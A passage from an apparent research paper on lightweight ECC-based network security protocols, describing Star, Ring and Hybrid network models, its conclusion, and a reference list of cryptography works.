Normally, attackers can break a network using RF direction finding, traffic-rate analysis and<br />
time-correlation monitoring. In the proposed MTN, however, one cannot easily discover the roles played<br />
by nodes, the existence and location of nodes, or the current location of specific functions (MP or Lie). Further,<br />
the MTN has been classified into different models (Star, Ring and Hybrid) serving different<br />
applications. Star-MTN is a collection of communication protocols connected to a central hub, which<br />
distributes NSP 1, 2 and 3 to the nodes. All communication lines traverse the central hub. The<br />
advantage of this topology is the simplicity of adding additional nodes. This model has applications<br />
in VSAT terminals. In local or wide area networks, where Ring-MTN could be used, each system is<br />
connected to the network in a closed loop or ring. All systems in the ring are connected to each<br />
other by NSP = {NSP 1, MP & Lie functions}, with the ability to switch over from NSP 1 to NSP 2 or 3.<br />
Hybrid-MTN grows quadratically with the number of nodes: if there are n nodes in a hybrid<br />
communication, it requires n(n-1)/2 network paths to make a full mesh network. In this model,<br />
NSP 1 can be converted to NSP 2 or NSP 3 by exchanging MP or Lie functions between nodes.<br />
This model is widely applicable to telecommunication paths such as mobile roaming and<br />
international SMS.<br />
Figure 2: Star-MTN<br />
Figure 3: Ring-MTN<br />
Figure 4: Hybrid-MTN<br />
8. Conclusion<br />
The network security protocols produced by the system and method of this invention find a number of<br />
applications in information security and communication channels. In particular, they apply directly to<br />
remote sensing, keyless entry, access control and defense systems. Since these protocols are secure<br />
and less computationally complex (compared with certificate-based PKC), they can be used together<br />
in an MTN to improve efficiency. In terms of memory and space, protocols 1, 2 and 3 with ECC-256<br />
are suitable for tiny devices. Hence we conclude that the proposed protocols could be used for<br />
multiple applications.<br />
References<br />
Shamir, A. (1984) “Identity-Based Cryptosystems and Signature Schemes”, Advances in Cryptology:<br />
Proceedings of CRYPTO 84, Lecture Notes in Computer Science, vol 196, pp 47-53.<br />
Al-Riyami, S.S. and Paterson, K.G. (2003), “Certificateless Public Key Cryptography”, Advances in Cryptology -<br />
Proceedings of ASIACRYPT -2003.<br />
Bellare, M. and Rogaway, P. (1993) “Random oracles are practical: A paradigm for designing efficient protocols”,<br />
In ACM CCS 93: 1st <strong>Conference</strong> on Computer and Communications Security, pp 62–73, USA.<br />
Bellovin, S.M. and Merritt, M. (1992) “Encrypted key exchange: Password-based protocols secure against<br />
dictionary attacks”, IEEE Symposium on Security and Privacy, pp 72–84, Oakland, California, USA.<br />
Certicom Research (2000), Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Ver. 1.0,<br />
[Online], Available: http://www.secg.org/download/aid-385/sec1_final.pdf<br />
Diffie, W. and Hellman, M.E. (1976) “New directions in cryptography”, IEEE Transactions on Information Theory,<br />
22(6):644–654.<br />
Hankerson, D., Menezes, A. and Vanstone, S.A. (2004), Guide to Elliptic Curve Cryptography, Springer-Verlag.<br />
Jacobson, N. (1979), Lie Algebras, Dover Publications, Inc., New York.<br />
MacKenzie, P.D. (2002) The PAK suite: Protocols for password-authenticated key exchange, Contributions to<br />
IEEE P1363.2.<br />
Needham, R.M. and Schroeder, M.D. (1978) “Using encryption for authentication in large networks of<br />
computers”, Communications of the Association for Computing Machinery, 21(21):993– 999.<br />
Vijayarangan, N. (2009) “Design and analysis of Message Preprocessing functions for reducing Hash<br />
collisions”, Proceedings of ISSSIS, Coimbatore, India.<br />
Vijayarangan, N. (2009), “Method for preventing and detecting hash collisions of data during the data<br />
transmission”, USPTO Patent Pre-grant No. 20090085780.<br />
Vijayarangan, N. and Kasilingam, S. (2004), “Random number generation using primitive polynomials”,<br />
Proceedings of SSCCII, Italy.<br />
Vijayarangan, N. and Vijayasarathy, R. (2005), “Primitive polynomials testing methodology”, Jour. of Discrete<br />
Mathematical Sciences and Cryptography, vol 8(3), pp 427-435.<br />